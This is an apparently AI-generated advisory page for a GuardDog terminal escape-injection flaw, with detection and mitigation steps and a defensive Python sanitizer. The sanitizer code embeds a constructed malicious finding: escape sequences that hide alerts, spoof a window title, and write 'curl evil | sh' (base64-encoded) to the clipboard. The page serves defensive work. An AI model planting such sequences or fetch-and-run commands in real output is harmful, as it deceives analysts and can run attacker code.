CVE-2026-44972 Overview
CVE-2026-44972 affects GuardDog, a command-line tool from DataDog used to identify malicious PyPI packages. Versions 2.6.0 through 2.9.0 include attacker-controlled filenames, file locations, heuristic messages, and code snippets in the default human-readable output without escaping terminal control characters before printing them. A malicious package can therefore inject ANSI control sequences (Control Sequence Introducer, CSI) and Operating System Command (OSC) sequences into analyst terminals or continuous integration (CI) logs. The flaw maps to [CWE-116: Improper Encoding or Escaping of Output].
Critical Impact
Malicious PyPI packages can manipulate terminal output, hide indicators of compromise, or spoof scan results in CI/CD pipelines analyzing untrusted code.
Affected Products
- DataDog GuardDog 2.6.0 through 2.9.0 inclusive (all 2.6.x, 2.7.x and 2.8.x releases, and 2.9.0)
Discovery Timeline
- 2026-05-27 - CVE-2026-44972 published to NVD
- 2026-05-27 - Last updated in NVD database
Technical Details for CVE-2026-44972
Vulnerability Analysis
GuardDog scans PyPI packages and reports findings through a default human-readable formatter. The formatter writes attacker-influenced fields directly to standard output. These fields include filenames, file paths, heuristic messages, and source code snippets extracted from the analyzed package.
Because the output path performs no sanitization, any byte sequence present in the package propagates to the terminal. Modern terminals interpret ANSI Control Sequence Introducer (CSI) and OSC sequences embedded in this stream. An attacker who publishes a package can craft filenames or code that include these sequences.
The practical impact depends on the terminal in use. Attackers can overwrite previous lines to hide alerts, recolor output to mask high-severity findings, set window titles, or write to the clipboard through OSC 52 where the terminal permits clipboard writes (several terminals disable OSC 52 writes by default). In CI logs, injected sequences can break log parsers or render misleading evidence to reviewers.
Root Cause
The default output renderer concatenates untrusted strings into terminal output without filtering C0 control codes or escape sequences. GuardDog treats scan findings as trusted display data rather than as untrusted input that requires encoding before rendering.
Attack Vector
Exploitation requires an analyst or CI job to scan a malicious package with GuardDog 2.6.0 through 2.9.0 using the default human-readable output format. The attacker controls the package contents on PyPI or any other source GuardDog ingests. When GuardDog prints findings, the terminal, or any log viewer that honours escape sequences, interprets the embedded sequences. In CVSS terms user interaction is required: a human or a pipeline must invoke the scan, so the attacker's task is to get the package scanned.
The vulnerability is described in prose only because no public exploit code is referenced. See the GitHub Security Advisory GHSA-m5p4-gvpx-4mvr for vendor technical details.
Detection Methods for CVE-2026-44972
Indicators of Compromise
- Presence of raw \x1b[ (ESC, byte 0x1b, followed by '[': the CSI introducer) or \x1b] (ESC followed by ']': the OSC introducer) byte sequences in GuardDog scan output or stored CI logs.
- PyPI package artifacts containing filenames with non-printable control characters or embedded escape codes.
- Unexpected terminal behavior during scans, including cleared screens, altered colors, or modified window titles.
Detection Strategies
- Pipe GuardDog output through cat -v to reveal hidden control sequences in caret notation (ESC appears as ^[, BEL as ^G), or remove them with sed 's/\x1b\[[0-9;]*[a-zA-Z]//g' (GNU sed; this pattern strips common CSI sequences only, not OSC).
- Scan stored CI log artifacts for ANSI escape patterns originating from package metadata fields.
- Inventory installed GuardDog versions across developer workstations and CI runners to identify 2.6.0 through 2.9.0 deployments.
Monitoring Recommendations
- Monitor CI pipeline logs for control-character byte sequences in third-party scan tool output.
- Alert on GuardDog invocations against untrusted packages from non-pinned sources.
- Track GuardDog version drift in build images and developer tooling baselines.
How to Mitigate CVE-2026-44972
Immediate Actions Required
- Upgrade GuardDog to a version later than 2.9.0 that contains the output-encoding fix per the vendor advisory.
- Run GuardDog in non-interactive mode using machine-readable formats such as JSON or SARIF when scanning untrusted packages.
- Review historical CI logs for injected escape sequences that may have hidden prior findings.
Patch Information
DataDog addresses the issue in GuardDog releases after 2.9.0. Refer to the GitHub Security Advisory GHSA-m5p4-gvpx-4mvr for the fixed version and the corresponding commit.
Workarounds
- Use the JSON output mode (--output-format json) and parse results programmatically rather than reading raw terminal output. A compliant JSON encoder escapes control characters (U+0000 through U+001F, including ESC and BEL) as \uXXXX, so the file itself is safe to view; any tool that decodes the JSON and re-renders the strings to a terminal must still sanitize them.
- Strip ANSI and OSC escape sequences from GuardDog output before display when running an unpatched version.
- Restrict GuardDog scans of untrusted packages to ephemeral sandboxes that do not share terminal sessions with analysts.
# Configuration example
# Run GuardDog with JSON output to avoid terminal rendering of attacker-controlled fields
guarddog pypi scan <package> --output-format json > scan-results.json
# When raw output must be reviewed, strip escape sequences first (GNU sed, which expands \xHH escapes).
# The first expression removes common CSI sequences; the second removes OSC sequences terminated
# by BEL (\x07) or ST (ESC \). Other control bytes still pass through, so use cat -v to inspect them.
guarddog pypi scan <package> | sed -E 's/\x1b\[[0-9;?]*[A-Za-z]//g; s/\x1b\][^\x07\x1b]*(\x07|\x1b\\)//g'
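The following Python module is an added example, not GuardDog's own code or the vendor's fix. It covers two points on this page at once: the detection strategy of scanning stored CI log lines for escape sequences, and the strip-before-display workaround, alongside a toy formatter that reproduces the CWE-116 pattern (untrusted fields concatenated into terminal output verbatim). It goes slightly beyond the sed one-liner above by handling CSI, OSC (BEL- or ST-terminated), DCS/PM/APC strings, other two-byte ESC sequences and the 8-bit C1 forms, and by caret-escaping leftover C0 bytes the way cat -v does. All function names (find_escape_sequences, strip_escape_sequences, scan_log_lines, render_finding), the sample finding and the CI log lines are constructed for illustration.

```python
"""Detect and neutralize terminal escape sequences in scanner output.

Added example for this page; not GuardDog's code. Sample data is constructed.
"""
from __future__ import annotations

import re

# Sequence families a terminal acts on. Byte ranges follow ECMA-48:
#   CSI         ESC [ params(0x30-0x3F) intermediates(0x20-0x2F) final(0x40-0x7E)
#   OSC         ESC ] payload, terminated by BEL or ST (ESC \)
#   DCS/PM/APC  ESC P, ESC ^, ESC _ payload, terminated by BEL or ST
#   other       ESC intermediates* final (e.g. ESC ( B charset designation)
# The 8-bit C1 forms (0x9B, 0x9D, 0x90, 0x9E, 0x9F) are included because some
# terminals honour them. An unterminated string sequence runs to end of input,
# which is how a terminal would treat it.
ESCAPE_RE = re.compile(
    r"(?P<csi>(?:\x1b\[|\x9b)[0-?]*[ -/]*[@-~])"
    r"|(?P<osc>(?:\x1b\]|\x9d)[^\x07\x1b]*(?:\x07|\x1b\\|\Z))"
    r"|(?P<ctlstr>(?:\x1b[P^_]|[\x90\x9e\x9f])[^\x07\x1b]*(?:\x07|\x1b\\|\Z))"
    r"|(?P<esc>\x1b[ -/]*[0-~])"
)

# Remaining C0 controls and DEL are shown in caret notation like `cat -v`.
# Tab and newline are kept; carriage return is not, because \r alone can be
# used to overwrite the current line.
C0_RE = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")


def _caret(m: re.Match) -> str:
    c = ord(m.group(0))
    return "^?" if c == 0x7F else "^" + chr(c + 0x40)


def find_escape_sequences(text: str) -> list[tuple[str, str]]:
    """Return (kind, raw_sequence) for every escape sequence found in text."""
    return [(m.lastgroup, m.group(0)) for m in ESCAPE_RE.finditer(text)]


def strip_escape_sequences(text: str) -> str:
    """Make text safe to print: drop escape sequences, caret-escape C0 bytes."""
    return C0_RE.sub(_caret, ESCAPE_RE.sub("", text))


def scan_log_lines(lines: list[str]) -> list[tuple[int, str, str]]:
    """Scan stored CI log lines; return (line_no, kind, raw) for each hit."""
    return [(n, kind, raw)
            for n, line in enumerate(lines, 1)
            for kind, raw in find_escape_sequences(line)]


def render_finding(finding: dict, sanitize: bool) -> str:
    """Toy human-readable formatter (not GuardDog's). With sanitize=False it
    reproduces the flaw: attacker-controlled fields reach the terminal as-is."""
    enc = strip_escape_sequences if sanitize else (lambda s: s)
    return (f"{finding['rule']} at {enc(finding['location'])}: "
            f"{enc(finding['message'])}\n    {enc(finding['code'])}")


# Constructed finding from a hypothetical malicious package. The location
# erases the current line and moves the cursor up, hiding the alert; the code
# snippet carries an OSC 52 clipboard write (base64 of "curl evil | sh") and
# an OSC 0 window-title change terminated by ST.
MALICIOUS_FINDING = {
    "rule": "exec-base64",
    "location": "setup.py:12\x1b[2K\x1b[1A",
    "message": "base64 payload passed to exec()",
    "code": "exec(b64decode(PAYLOAD))"
            "\x1b]52;c;Y3VybCBldmlsIHwgc2g=\x07"
            "\x1b]0;all clear\x1b\\",
}

# Constructed CI log, as a pipeline would have stored it from a vulnerable run.
CI_LOG = [
    "[guarddog] scanning pypi package evil-pkg 1.0.0",
    *("[guarddog] " + render_finding(MALICIOUS_FINDING, sanitize=False)).splitlines(),
    "[guarddog] scan complete",
]

if __name__ == "__main__":
    print("unsafe:", repr(render_finding(MALICIOUS_FINDING, sanitize=False)))
    print("safe:  ", render_finding(MALICIOUS_FINDING, sanitize=True))
    for line_no, kind, raw in scan_log_lines(CI_LOG):
        print(f"line {line_no}: {kind} {raw!r}")
```

The scanner reports the two CSI sequences on the finding line and the two OSC sequences on the code line; the sanitized rendering keeps the finding readable while nothing in it can move the cursor, retitle the window or touch the clipboard. The regex deliberately matches an unterminated OSC to end of input, since that is what a terminal would swallow.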
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

